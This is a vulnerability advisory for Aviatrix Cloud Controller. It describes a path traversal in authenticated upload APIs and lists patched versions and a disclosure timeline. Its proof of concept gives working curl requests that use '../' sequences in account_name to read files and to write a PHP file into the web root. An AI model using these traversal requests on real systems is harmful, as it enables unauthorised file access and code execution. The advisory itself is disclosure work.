Advisory

Overview

Aviatrix Cloud Controller includes multiple APIs that by design upload files from authenticated users. Some of these APIs do not adequately sanitise their input, allowing an attacker to construct a pathname that is outside the intended upload directory. The directories that can be written to include those under the web root, which allows an attacker to upload and then run code of their choosing.

Proof of concept

1. Log into Aviatrix to obtain a CID token. This is sent in the response to the login_proc action, and used in most API calls.

$ curl -k https://aviatrix/v1/backend1 -d action=login_proc -d "username=Test User" -d "password=Password"

2. Using the CID, make the following request, which will read a file from /tmp. On recent versions (after January 2021), replace the path with /../../../var/www/build_info:

curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=get_metric_gw_selections -d account_name=/../../../../../tmp/build_info

3. Make the following request, which will create a file in /var/www/php/downloads. This directory is not protected by a .htaccess file.

curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=set_metric_gw_selections -d account_name=/../../downloads/test.php -d data="hello<?php phpinfo()?>"

4. Visit https://aviatrix/v1/downloads/test.php, which will show the PHP Version information.

Mitigation/further actions

Upgrade to one of the following versions:

• UserConnect-6.2-1804.2043 or later
• UserConnect-6.3-1804.2490 or later
• UserConnect-6.4-1804.2838 or later
• UserConnect-6.5-1804.1922 or later

Advisory timeline

1. 2021-04-20: Discovered
2. 2021-08-24: Reported to Aviatrix security team
3. 2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
4. 2021-09-11: Fix released